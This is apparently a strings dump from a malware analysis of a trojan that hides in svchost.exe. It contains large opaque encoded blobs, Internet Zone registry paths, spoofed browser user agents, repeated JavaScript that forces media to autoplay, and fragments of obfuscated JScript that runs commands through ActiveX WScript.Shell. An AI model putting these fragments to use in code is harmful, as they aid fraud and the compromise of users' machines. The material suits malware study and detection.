e3jZzSQzPO8oNqYRrM1iUX9oR4JfxN2VGOf3S5o2d/T mGa2CFciQHXlngJv1GBLZZkoFw3uNAHi54gBzE4mqOqUOORvqJOWNdd657rWO12FAzkgyrycbCRR HAgH2H/3uspgawgfeVoNDJm6T69CRssEFvRGKhYFnJUhRMGLE/bsqCnxEEhHAecYCXeBkMkOdqXTdEhkwl1mPIlocsMYUmvpqCP7H1DplJ1/GwFCSM4qku9 TjrCxIom7QPXqrTbCwCZN9f5jZiW7AZFT3jOMWtPcFYojPUPAEa7fwwFa4dfoSjBTdq1HA1yim70WrxShO9J12Rc4Ejnk6DlhDU48y0GMvQ9OfA5jaq2D2e20G1ot571IvFuy2oU4gp4SQsYoWihHlvYX1GPQwe3I6QYobvtfAcQ1XLVT6IY571f4HkDAmLcSe5xlq4GotRjkHqPoT0U9OjwdTG4RY8/2Cn6NM16mTK8bWhrzK1x0qGoBbGWbCU o8IKk1uI7w9q t I81C2bLFHMVWTzlB4Iy7wWVM19jAPOhLVB 
f98VjJJOx6hDglbljzaWUBuqYKm0afntFvKkF0nRZo9ZNcKoBZ/am1U02zYppGWkKXfY0VkBZDqa21QFDkyohtDVeoCP1NnVEkbXv/8bHWqeEOZiGcp4CmA/lhzlnMNf8fKgT656xMkIZLHc0WwecT967vPfXdyahZDaVyGSrjdhWswsHSpx9NcTT8w7KX8kM750DhA bP6WrxiRupDuHDHFDwH75ikMUYtpeNFWQM25U9J 2ey2HqyVpghmMU0a1V1tDJDtKs4glEUskMdGjI13Fbq1WKjGYNKq2Pkuc1LyoAyrML8jjyZ317BrqMqRN1emBd8c8dWZiq1j18/wovTZc0qGJ1vTKDqLp6p3ptdKuTh6SeEDYN2F3HDsftitXHxYpydPAB mF2YmIdGikVCT3AASvID39DXYidXo7Yk MfTWkal4l6L6dPnYzxebm nBNlIrKynVPPQ0ISgseYCGBjo/y/1CcBgUUhe620kXoYvMlHzi86aftheeirJIVz4AmKW75GAmZGXruIQr18DdtBaaZgy5nPX8S2sc7B1PkEu3AR/ 7xOAcKmDN/bgSWet9uLbsL/tz0DZ//y7HvshyB08gKO00klNpewoFePk1u7V fctI0gRpz1rZhz4/PlkEUyvCc7 Ge9LqxIUfM 0/l87bAJGhMbpK nNlqDVo9UWyz40B8tPEv8UakNRju6biU Kz79Od7Ul7HB5InxblzqBRQxcYszUYmh3Xckd/prNXnL 66ze k/aYtUP46d8tEnNOHFyl5vqX/RhDXGglxClrRfSOUD04l8dHOG6DgUsPzDtZ8 b0a6ULYdjlZ7V5WaB7r/FLr2AbF4672A85JVt2eIvN5wF8z/66Ju29JfXggSyonEYQf9PGDzX7LkmbqyMPXhjwPnShcGcFIcInswotoj2JKnp9R8QUXS5xP8RBHjpur6/adfZj7/cl0mu5ZCkPL0OKkxhk97m3P1BmPdzHsIHLBoynG2 ZiZf4wImTixwy0twy01Ud7tlVaMQ8f9ZhBuH5JUIf0 peZl3NTbjDS2rwXHC8hM8qKLMRkwOK1o71yveLrg6rJVdtfIYs4AZRGiVcsIxKM/ioAIh 3M IngboQPJtq/HtHFsxST0TgiMJZJK QONshSV/ntzXMpqxMzudlXMhiOhfPFKBG1fk3rrvxlTenuay NiLSXE2zjo9ijHRBdfoXHeYsBYerXth1pCxug6oRXvvhHx98sWFoTFS2nDLT/PE3Ch2oz RQ62S/mz7Bumzq7o1QrMLAedEx6JFKhJ56AVUsKKrqPQhz0Xs5HhQtmFviOnlZwFIve/liZvZ9hva9ax/xWO6CVFbyX4p6gTVpiJcb3nbAfwd2RsvDsphxC7/L2zOQ 9 oDk1DFxxqahMrmBk1NL0nlcVrn4p9FqhVHVJb1eSMX60EUyJAFQx7aub8ZRgGjDolQdNTSGR52IZc9tklef0R agccDIpUtvSWk8D9AM3ZlN6VCsqEX pvfWMFXzskuU4FOzCpsH2baMNbo Qfg8hpOzrFsHwjOG 4RMpiIHcqP5fINrN1Jl4hDWYZuvttYtRPidECBesYX2NREqTmtoQfGgsF5Lu2PSpnHUzD7CrZIso6DBQtJf2uoGAStiRPe3uPo5ypA/HpItvFFXnbYJ4tJWIIjKWD8ViskcRwGdRVk ysoJx7IKnDewRWpSyTRPSuocoSGTjxcTkIIcfmNVhTz630dLAWlkaIzntjY1UPyfahpf6GYUOYSsynB6vYQ6j1JAzsJ4YWLbHaLa/M9en3qyQjbuBFhdm5 
AzDH4QuVtuNNuUK6eg24d0PB1px/SQw==plYbyktzMmNpkpcBPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPAD
4hVjXqVVZ1zvh89QP3KkWoknQHJBor8qRuornGiIK3Azy/OkZNZ8dvu4BF4eNlZ ylMtd n6NYUMFAsPMFVcCp5riCv QJLU0cH8CxWwhpe3LU bL4dfZCyuZxVtJpQQjcSgKzK2zdCDtPRZUgo0ZjbbA5j0pXzJceUhUU2 3gGBXwXO3qybTJCQYhJFCJgussq9WVxjFKM7t91zIHKCdGCSXRoN4vBn1 yjFJuN7qowC1wpOTHO4Px0sKwHT3R0BStQccAL CWBsBvT3pHgt UyiVy0nAEqwkW6ORL3Yn x/QBoAKRohKjOA3qiq0P1CEDcQVkAOH3ceS8p9uBczn1sfXP 8n7q3Hkwnpxw7emo wVf2dS8EuLgBXvkufgMSTPh/KWYIWJK aNIlC5fYdqA6130llwEVFL9lYa8IHaqET84zqpZV9ApywvvRR/ydoUVnBiX24V2VqrBrnMoaIxT4ww71bTxxpFOD7LK52T3mj9oPyIsTVfTO5WbWr7/It/2j/eCspOBiNFYTik SnUl3XXJasnYIRnZHaZtX/ 5dQHO1hRMyG5d1TUUpyvPjUWQCPBrs1zj2JVBsqi0Lug1FmDRb4Hphc55wOtvZYO6zv1iwShwtqP3dbyhQ E66yCCdglju2JU 4zw5v4cBWqGIJPRSB7YRPL2LhnXbPNzsuKrCvA/nCz7HmPdp34g5pMcd8wPqh0jpx5QcvGK9GywKG330GLMTn7qFnOApziobstprpaga0zfFLpr2Ni 5rAG9juaEYZ8ES3XndpzC2QBw2cGnFYkB7BRH3NE5tNeg7SzxuUtCUPo0/PJZvIHt5Sq8xclSSatHNeEbYR 2dMKQ4vv3moTXVc40GtarkG8y8CLYwYjNDtm22CIeNq8/f0YoMEE8zGzWIWhCz7jWDVgD3H62bHwbscJJ4KUwiRSk4Om UrUzV X7AvENmT khv1luO9PmP6lrzTTUhZZWd3lmZlrIsgyMyQiQGCgz2njYQx0P3o9fObPjumMa3RvYi0vFvXl/ofhxzcnccq7 5T6NO2HKIEsN6t4lweBCBmYPjv8dp/h0lR7KFJPlMtdvzkZW0QrTdulQq1E45RdtVhWXhcuwmwGVz1RapaX2dgGfsy1e75vvxQ35Q5EkoYp0VE7F1NlJWYylGb3pN4C5iPG5 sDXXJzLs9WwIAXGU4X4FTG8QXuVW9xevMSl//s4PtqS4Wb1V7TH1V6IjV8QcUAt3TWA17WfH0CmcWO6pX3Sjhex2qTd2DjduSK7UqbZrNlaSuZgYZeB4g70T9pkgEN52M78g/lq8SYGJMtv182S7zf5pi87PfPlMyHx6DIfo2vztikWnXiuk6Hrvn04jLJ2yQqIrUgB Msl/t2OBmmgvXuWu7dum/BARM2fn2y68OQEW6W5KQd0TTuMUtxTgC1XE2qod5FSJknRDoJQuua3uJ7xAEhm6rmaAoDw/AqoHMVyCpRRE1IsfXcYEfZ4/MlkTI3aeY 3DpeyEdVUWj3lSZReJs2i3nxLoFsLwmvc2ze/OkLG10CihIl7UVu1BGo7v14bZWp5AuGlFNPJOp6rn66zjv2G9PN/RKb/q9vSouSI5BgO0DdRC kcgs0ol6jeGjfySpljStqDFHY44Eod vKsT5nhyjcERVUU/0Dl0mmQVob7BWpwgkQrVqmgFjfgg/G2P3jhH h4gPxdr0lHmDlrx BlJQCXsY3uuTXU2DKPFjDB0BakFtBdHQQ4MbIYK0X7OJiO6tBA1zBx0SUcATf 7uNeA5gdC254euPXliSrW8JFwDBMIH4diXWe3HHFyVAEO9NKnn LhUbiAEuwz4BHsIaA0SMeqT9HRch QndJGw/ wnP2fQBEyfbTEBBW8mKYIhHe64jWhp3XK68w4xTFMvTf29 mQuvElJ0t9z4ePY9pBCGdYvOCPJ2qvlyKb1R26HJ1255HFoioyWcV8PkmCxA3zFez1j 
sQsVRblBtejWlMwC9QuCoRygDvT28C06viV8bSlvyFA0jrvqiWr3xSFDicmis8wNYfNpTeJM48RWSjKi83maskgpeYl sWifQYNfLxIEmJ/QsWXOUs7uIabjoZlC8vAY14mTfszg9zZDm214qJimYJvwgv xdPZDKC73hN6Nzpw6jOylC7dU1GesKS/BNDTz0XKJizFDS3qdShIuB3D4Yg9LA9RMCNESl1k0fZFQzdlwG5hrmg6FN50s3a/YoRgGHbQLgV7FVAHt/CQ5waA8LSS4 8fKdzjzZm59ZnCLG3lcADgbeMPU1 1slH5Rf3tByagaY22TLMmeaiEGeyat8eImgWJh9scEMSpGo4 sjyWtbQS uBBwPPN8EY3bNC7pK5qXw/XYs3WpG4MmEotCLAkar053JAKiy5n 7k0LNTucDhmfL6S7ihLshfR5R8/qY4To8dfBkjmpQD 8bQd9OtnzWQOnQNk6kD4 WigsSP49uYu6Bo0bxMgrq IpnAdO6CxlUpKD2l B11uTiLkjsjs5Ey9cMSs8qUq19G6Nk yUr3bW A/7EJ75MvAX8XnpbuajNjhHyg/W1omrs5t9oI/W0SJLtca62q8cnCxlEFXK0hfxPbDs8UQui88Yha4dfp9PbHDGkh7LkvkGW7CjLsv5Gr2EKpzt3/FJ9s9Z8ghlMtr4ccaM9tF3q42nJB1qc57m bHSkE1rR/45EUZ5Hl8jX4XfM1BnodKvXurFpyCmZcR6IvMxvKgoYH01x2HiXrNbXuPltTsYChzYPn0vLf9AI2quM7Ca1H1ge38n4NFU3dUchWwRbr1RyI3xTNrF6pFMouB1YdrchH4TnDJoKoWPrjokTsT0C7kTnunZOYGvVPBgAYq8ldh05ItdpwUMVLnxpmsxHixBIFW7x2 s/ezpDm3r fOkNPR/wCKR7Tk7n8Tbh12HRCnslr1jSFbuC2ElvGGYVIQ35p9hAveyXDAN3qObdqgw3J LmjFszDREW DHVE488lC bZ6JiyN5BmuBIIKLRPmZXN4qGZGuOH55RwHYgvXONYe018OiUeOpcIKVUvTmz1M1qDjASEaQpnecdGeugQ/QbMuZB/veq/SHR OZarDO BO UQ8s0/V1Z lU4bU0JkTN1fiInZKnC5YsfZOGh5xEKZTsiB7TKTFA96GwQlAIKmkLSZ6RqqRnW5pCGzugAD6HlQEmNbGY SDuz9RFBdIg394S3eG9BQaqGFGOdxK4FIBBm5pg1efkq9wM5e3ItHt6oFkA mNArXVJnXp3z2l/sx9u32H5Al33guWzylllwn8lyrWcZNWkBpt5EIYEVuCEzm8CcTfz5zlnI5uSeWLYaDjTJa qebJDEp e3jZzSQzPO8oNqYRrM1iUX9oR4JfxN2VGOf3S5o2d/T mGa2CFciQHXlngJv1GBLZZkoFw3uNAHi54gBzE4mqOqUOORvqJOWNdd657rWO12FAzkgyrycbCRR HAgH2H/3uspgawgfeVoNDJm6T69CRssEFvRGKhYFnJUhRMGLE/bsqCnxEEhHAecYCXeBkMkOdqXTdEhkwl1mPIlocsMYUmvpqCP7H1DplJ1/GwFCSM4qku9 TjrCxIom7QPXqrTbCwCZN9f5jZiW7AZFT3jOMWtPcFYojPUPAEa7fwwFa4dfoSjBTdq1HA1yim70WrxShO9J12Rc4Ejnk6DlhDU48y0GMvQ9OfA5jaq2D2e20G1ot571IvFuy2oU4gp4SQsYoWihHlvYX1GPQwe3I6QYobvtfAcQ1XLVT6IY571f4HkDAmLcSe5xlq4GotRjkHqPoT0U9OjwdTG4RY8/2Cn6NM16mTK8bWhrzK1x0qGoBbGWbCU o8IKk1uI7w9q t I81C2bLFHMVWTzlB4Iy7wWVM19jAPOhLVB 
f98VjJJOx6hDglbljzaWUBuqYKm0afntFvKkF0nRZo9ZNcKoBZ/am1U02zYppGWkKXfY0VkBZDqa21QFDkyohtDVeoCP1NnVEkbXv/8bHWqeEOZiGcp4CmA/lhzlnMNf8fKgT656xMkIZLHc0WwecT967vPfXdyahZDaVyGSrjdhWswsHSpx9NcTT8w7KX8kM750DhA bP6WrxiRupDuHDHFDwH75ikMUYtpeNFWQM25U9J 2ey2HqyVpghmMU0a1V1tDJDtKs4glEUskMdGjI13Fbq1WKjGYNKq2Pkuc1LyoAyrML8jjyZ317BrqMqRN1emBd8c8dWZiq1j18/wovTZc0qGJ1vTKDqLp6p3ptdKuTh6SeEDYN2F3HDsftitXHxYpydPAB mF2YmIdGikVCT3AASvID39DXYidXo7Yk MfTWkal4l6L6dPnYzxebm nBNlIrKynVPPQ0ISgseYCGBjo/y/1CcBgUUhe620kXoYvMlHzi86aftheeirJIVz4AmKW75GAmZGXruIQr18DdtBaaZgy5nPX8S2sc7B1PkEu3AR/ 7xOAcKmDN/bgSWet9uLbsL/tz0DZ//y7HvshyB08gKO00klNpewoFePk1u7V fctI0gRpz1rZhz4/PlkEUyvCc7 Ge9LqxIUfM 0/l87bAJGhMbpK nNlqDVo9UWyz40B8tPEv8UakNRju6biU Kz79Od7Ul7HB5InxblzqBRQxcYszUYmh3Xckd/prNXnL 66ze k/aYtUP46d8tEnNOHFyl5vqX/RhDXGglxClrRfSOUD04l8dHOG6DgUsPzDtZ8 b0a6ULYdjlZ7V5WaB7r/FLr2AbF4672A85JVt2eIvN5wF8z/66Ju29JfXggSyonEYQf9PGDzX7LkmbqyMPXhjwPnShcGcFIcInswotoj2JKnp9R8QUXS5xP8RBHjpur6/adfZj7/cl0mu5ZCkPL0OKkxhk97m3P1BmPdzHsIHLBoynG2 ZiZf4wImTixwy0twy01Ud7tlVaMQ8f9ZhBuH5JUIf0 peZl3NTbjDS2rwXHC8hM8qKLMRkwOK1o71yveLrg6rJVdtfIYs4AZRGiVcsIxKM/ioAIh 3M IngboQPJtq/HtHFsxST0TgiMJZJK QONshSV/ntzXMpqxMzudlXMhiOhfPFKBG1fk3rrvxlTenuay NiLSXE2zjo9ijHRBdfoXHeYsBYerXth1pCxug6oRXvvhHx98sWFoTFS2nDLT/PE3Ch2oz RQ62S/mz7Bumzq7o1QrMLAedEx6JFKhJ56AVUsKKrqPQhz0Xs5HhQtmFviOnlZwFIve/liZvZ9hva9ax/xWO6CVFbyX4p6gTVpiJcb3nbAfwd2RsvDsphxC7/L2zOQ 9 oDk1DFxxqahMrmBk1NL0nlcVrn4p9FqhVHVJb1eSMX60EUyJAFQx7aub8ZRgGjDolQdNTSGR52IZc9tklef0R agccDIpUtvSWk8D9AM3ZlN6VCsqEX pvfWMFXzskuU4FOzCpsH2baMNbo Qfg8hpOzrFsHwjOG 4RMpiIHcqP5fINrN1Jl4hDWYZuvttYtRPidECBesYX2NREqTmtoQfGgsF5Lu2PSpnHUzD7CrZIso6DBQtJf2uoGAStiRPe3uPo5ypA/HpItvFFXnbYJ4tJWIIjKWD8ViskcRwGdRVk ysoJx7IKnDewRWpSyTRPSuocoSGTjxcTkIIcfmNVhTz630dLAWlkaIzntjY1UPyfahpf6GYUOYSsynB6vYQ6j1JAzsJ4YWLbHaLa/M9en3qyQjbuBFhdm5 
AzDH4QuVtuNNuUK6eg24d0PB1px/SQw==plYbyktzMmNpkpcBPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADc
.Default
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Ratings\
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1
svchost.exe
explorer.exe
66006666
.Method '%s' not supported by automation object/Variant does not reference an automation object
External exception %x
Interface not supported
%s (%s, line %d)
Abstract Error?Access violation at address %p in module '%s'. %s of address %p
Invalid pointer operation
Invalid class typecast0Access violation at address %p. %s of address %p
Privileged instruction%Exception %s in module %s at %p.
Application Error1Format '%s' invalid or incompatible with argument
No argument for format '%s'
Invalid variant operation"Variant method calls not supported
I/O error %d
Integer overflow Invalid floating point operation
c:\%original file name%.exe path<<c:\%original file name%.exe>>path

svchost.exe_152_rwx_01000000_00006000:

.text
`.data
.rsrc
ADVAPI32.dll
KERNEL32.dll
NTDLL.DLL
RPCRT4.dll
NETAPI32.dll
ole32.dll
ntdll.dll
RegCloseKey
RegOpenKeyExW
GetProcessHeap
NtOpenKey
svchost.pdb
\PIPE\
Software\Microsoft\Windows NT\CurrentVersion\Svchost
\Registry\Machine\System\CurrentControlSet\Control\SecurePipeServers\
5.1.2600.5512 (xpsp.080413-2111)
svchost.exe
Windows
Operating System
5.1.2600.5512

svchost.exe_316:

.idata
.reloc
P.rsrc
Portions Copyright (c) 1983,99 Borland
kernel32.dll
Software\Microsoft\Windows NT\CurrentVersion
HTTP/1.1
Content-Type: application/x-www-form-urlencoded
URLMON.DLL
Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)
Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; InfoPath.3)
Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.30729)
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].Play();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].PLAY();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].playVideo();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('embed'); for(var i=0;i<els.length;i++){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].Start();}} catch(e){}
try {var els=document.getElementsByTagName('object'); for(var i=0;i<els.length;i++){ els[i].START();}} catch(e){}
try {var els=document.getElementsByTagName('video'); for(var i=0;i<els.length;i++){ els[i].play();}} catch(e){}
try {jwplayer().play()} catch(e){}
PSAPI.dll
setcpu:
:setcpu
HTTP/1.1
.length;
+=String.fromCharCode(parseInt(
.substr(
,2),16));
+=String.fromCharCode(
,1).charCodeAt()^
,1).charCodeAt());
.length-1)?
=new ActiveXObject("WScript.Shell");
.Environment("Process"))("
.Run("
=new ActiveXObject("WScript.Shell");
.RegRead("
wininet.dll
user32.dll
ntdll.dll
psapi.dll
"svchost.exe"
svchost.exe
ole32.dll
Kernel32.dll
\\.\LCD
1234567890
Shell32.dll
\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones
hXXp://
0123456789
Mozilla
?456789:;<=
!"#$%&'()*+,-./0123
.text
`.rdata
@.pdata
KERNEL32.dll
GetKeyboardType
advapi32.dll
RegOpenKeyExA
RegCloseKey
oleaut32.dll
RegOpenKeyExW
RegCreateKeyW
RegCreateKeyA
GetCPInfo
SetProcessWindowStation
OpenWindowStationA
EnumChildWindows
NtQueryValueKey
NtDeleteValueKey
NtSetValueKey
HttpSendRequestA
HttpOpenRequestA
atl.dll
wsock32.dll
shell32.dll
ShellExecuteExW
wtsapi32.dll
Wtsapi32.dll
PSAPI.DLL
winmm.dll
urlmon.dll
UrlMkSetSessionOption
<%<*<;<@<
:!:%:):-:1:
?:???_?}?
4hVjXqVVZ1zvh89QP3KkWoknQHJBor8qRuornGiIK3Azy/OkZNZ8dvu4BF4eNlZ ylMtd n6NYUMFAsPMFVcCp5riCv QJLU0cH8CxWwhpe3LU bL4dfZCyuZxVtJpQQjcSgKzK2zdCDtPRZUgo0ZjbbA5j0pXzJceUhUU2 3gGBXwXO3qybTJCQYhJFCJgussq9WVxjFKM7t91zIHKCdGCSXRoN4vBn1 yjFJuN7qowC1wpOTHO4Px0sKwHT3R0BStQccAL CWBsBvT3pHgt UyiVy0nAEqwkW6ORL3Yn x/QBoAKRohKjOA3qiq0P1CEDcQVkAOH3ceS8p9uBczn1sfXP 8n7q3Hkwnpxw7emo wVf2dS8EuLgBXvkufgMSTPh/KWYIWJK aNIlC5fYdqA6130llwEVFL9lYa8IHaqET84zqpZV9ApywvvRR/ydoUVnBiX24V2VqrBrnMoaIxT4ww71bTxxpFOD7LK52T3mj9oPyIsTVfTO5WbWr7/It/2j/eCspOBiNFYTik SnUl3XXJasnYIRnZHaZtX/ 5dQHO1hRMyG5d1TUUpyvPjUWQCPBrs1zj2JVBsqi0Lug1FmDRb4Hphc55wOtvZYO6zv1iwShwtqP3dbyhQ E66yCCdglju2JU 4zw5v4cBWqGIJPRSB7YRPL2LhnXbPNzsuKrCvA/nCz7HmPdp34g5pMcd8wPqh0jpx5QcvGK9GywKG330GLMTn7qFnOApziobstprpaga0zfFLpr2Ni 5rAG9juaEYZ8ES3XndpzC2QBw2cGnFYkB7BRH3NE5tNeg7SzxuUtCUPo0/PJZvIHt5Sq8xclSSatHNeEbYR 2dMKQ4vv3moTXVc40GtarkG8y8CLYwYjNDtm22CIeNq8/f0YoMEE8zGzWIWhCz7jWDVgD3H62bHwbscJJ4KUwiRSk4Om UrUzV X7AvENmT khv1luO9PmP6lrzTTUhZZWd3lmZlrIsgyMyQiQGCgz2njYQx0P3o9fObPjumMa3RvYi0vFvXl/ofhxzcnccq7 5T6NO2HKIEsN6t4lweBCBmYPjv8dp/h0lR7KFJPlMtdvzkZW0QrTdulQq1E45RdtVhWXhcuwmwGVz1RapaX2dgGfsy1e75vvxQ35Q5EkoYp0VE7F1NlJWYylGb3pN4C5iPG5 sDXXJzLs9WwIAXGU4X4FTG8QXuVW9xevMSl//s4PtqS4Wb1V7TH1V6IjV8QcUAt3TWA17WfH0CmcWO6pX3Sjhex2qTd2DjduSK7UqbZrNlaSuZgYZeB4g70T9pkgEN52M78g/lq8SYGJMtv182S7zf5pi87PfPlMyHx6DIfo2vztikWnXiuk6Hrvn04jLJ2yQqIrUgB Msl/t2OBmmgvXuWu7dum/BARM2fn2y68OQEW6W5KQd0TTuMUtxTgC1XE2qod5FSJknRDoJQuua3uJ7xAEhm6rmaAoDw/AqoHMVyCpRRE1IsfXcYEfZ4/MlkTI3aeY 3DpeyEdVUWj3lSZReJs2i3nxLoFsLwmvc2ze/OkLG10CihIl7UVu1BGo7v14bZWp5AuGlFNPJOp6rn66zjv2G9PN/RKb/q9vSouSI5BgO0DdRC kcgs0ol6jeGjfySpljStqDFHY44Eod vKsT5nhyjcERVUU/0Dl0mmQVob7BWpwgkQrVqmgFjfgg/G2P3jhH h4gPxdr0lHmDlrx BlJQCXsY3uuTXU2DKPFjDB0BakFtBdHQQ4MbIYK0X7OJiO6tBA1zBx0SUcATf 7uNeA5gdC254euPXliSrW8JFwDBMIH4diXWe3HHFyVAEO9NKnn LhUbiAEuwz4BHsIaA0SMeqT9HRch QndJGw/ wnP2fQBEyfbTEBBW8mKYIhHe64jWhp3XK68w4xTFMvTf29 mQuvElJ0t9z4ePY9pBCGdYvOCPJ2qvlyKb1R26HJ1255HFoioyWcV8PkmCxA3zFez1j 
sQsVRblBtejWlMwC9QuCoRygDvT28C06viV8bSlvyFA0jrvqiWr3xSFDicmis8wNYfNpTeJM48RWSjKi83maskgpeYl sWifQYNfLxIEmJ/QsWXOUs7uIabjoZlC8vAY14mTfszg9zZDm214qJimYJvwgv xdPZDKC73hN6Nzpw6jOylC7dU1GesKS/BNDTz0XKJizFDS3qdShIuB3D4Yg9LA9RMCNESl1k0fZFQzdlwG5hrmg6FN50s3a/YoRgGHbQLgV7FVAHt/CQ5waA8LSS4 8fKdzjzZm59ZnCLG3lcADgbeMPU1 1slH5Rf3tByagaY22TLMmeaiEGeyat8eImgWJh9scEMSpGo4 sjyWtbQS uBBwPPN8EY3bNC7pK5qXw/XYs3WpG4MmEotCLAkar053JAKiy5n 7k0LNTucDhmfL6S7ihLshfR5R8/qY4To8dfBkjmpQD 8bQd9OtnzWQOnQNk6kD4 WigsSP49uYu6Bo0bxMgrq IpnAdO6CxlUpKD2l B11uTiLkjsjs5Ey9cMSs8qUq19G6Nk yUr3bW A/7EJ75MvAX8XnpbuajNjhHyg/W1omrs5t9oI/W0SJLtca62q8cnCxlEFXK0hfxPbDs8UQui88Yha4dfp9PbHDGkh7LkvkGW7CjLsv5Gr2EKpzt3/FJ9s9Z8ghlMtr4ccaM9tF3q42nJB1qc57m bHSkE1rR/45EUZ5Hl8jX4XfM1BnodKvXurFpyCmZcR6IvMxvKgoYH01x2HiXrNbXuPltTsYChzYPn0vLf9AI2quM7Ca1H1ge38n4NFU3dUchWwRbr1RyI3xTNrF6pFMouB1YdrchH4TnDJoKoWPrjokTsT0C7kTnunZOYGvVPBgAYq8ldh05ItdpwUMVLnxpmsxHixBIFW7x2 s/ezpDm3r fOkNPR/wCKR7Tk7n8Tbh12HRCnslr1jSFbuC2ElvGGYVIQ35p9hAveyXDAN3qObdqgw3J LmjFszDREW DHVE488lC bZ6JiyN5BmuBIIKLRPmZXN4qGZGuOH55RwHYgvXONYe018OiUeOpcIKVUvTmz1M1qDjASEaQpnecdGeugQ/QbMuZB/veq/SHR OZarDO BO UQ8s0/V1Z lU4bU0JkTN1fiInZKnC5YsfZOGh5xEKZTsiB7TKTFA96GwQlAIKmkLSZ6RqqRnW5pCGzugAD6HlQEmNbGY SDuz9RFBdIg394S3eG9BQaqGFGOdxK4FIBBm5pg1efkq9wM5e3ItHt6oFkA mNArXVJnXp3z2l/sx9u32H5Al33guWzylllwn8lyrWcZNWkBpt5EIYEVuCEzm8CcTfz5zlnI5uSeWLYaDjTJa qebJDEp e3jZzSQzPO8oNqYRrM1iUX9oR4JfxN2VGOf3S5o2d/T mGa2CFciQHXlngJv1GBLZZkoFw3uNAHi54gBzE4mqOqUOORvqJOWNdd657rWO12FAzkgyrycbCRR HAgH2H/3uspgawgfeVoNDJm6T69CRssEFvRGKhYFnJUhRMGLE/bsqCnxEEhHAecYCXeBkMkOdqXTdEhkwl1mPIlocsMYUmvpqCP7H1DplJ1/GwFCSM4qku9 TjrCxIom7QPXqrTbCwCZN9f5jZiW7AZFT3jOMWtPcFYojPUPAEa7fwwFa4dfoSjBTdq1HA1yim70WrxShO9J12Rc4Ejnk6DlhDU48y0GMvQ9OfA5jaq2D2e20G1ot571IvFuy2oU4gp4SQsYoWihHlvYX1GPQwe3I6QYobvtfAcQ1XLVT6IY571f4HkDAmLcSe5xlq4GotRjkHqPoT0U9OjwdTG4RY8/2Cn6NM16mTK8bWhrzK1x0qGoBbGWbCU o8IKk1uI7w9q t I81C2bLFHMVWTzlB4Iy7wWVM19jAPOhLVB 
f98VjJJOx6hDglbljzaWUBuqYKm0afntFvKkF0nRZo9ZNcKoBZ/am1U02zYppGWkKXfY0VkBZDqa21QFDkyohtDVeoCP1NnVEkbXv/8bHWqeEOZiGcp4CmA/lhzlnMNf8fKgT656xMkIZLHc0WwecT967vPfXdyahZDaVyGSrjdhWswsHSpx9NcTT8w7KX8kM750DhA bP6WrxiRupDuHDHFDwH75ikMUYtpeNFWQM25U9J 2ey2HqyVpghmMU0a1V1tDJDtKs4glEUskMdGjI13Fbq1WKjGYNKq2Pkuc1LyoAyrML8jjyZ317BrqMqRN1emBd8c8dWZiq1j18/wovTZc0qGJ1vTKDqLp6p3ptdKuTh6SeEDYN2F3HDsftitXHxYpydPAB mF2YmIdGikVCT3AASvID39DXYidXo7Yk MfTWkal4l6L6dPnYzxebm nBNlIrKynVPPQ0ISgseYCGBjo/y/1CcBgUUhe620kXoYvMlHzi86aftheeirJIVz4AmKW75GAmZGXruIQr18DdtBaaZgy5nPX8S2sc7B1PkEu3AR/ 7xOAcKmDN/bgSWet9uLbsL/tz0DZ//y7HvshyB08gKO00klNpewoFePk1u7V fctI0gRpz1rZhz4/PlkEUyvCc7 Ge9LqxIUfM 0/l87bAJGhMbpK nNlqDVo9UWyz40B8tPEv8UakNRju6biU Kz79Od7Ul7HB5InxblzqBRQxcYszUYmh3Xckd/prNXnL 66ze k/aYtUP46d8tEnNOHFyl5vqX/RhDXGglxClrRfSOUD04l8dHOG6DgUsPzDtZ8 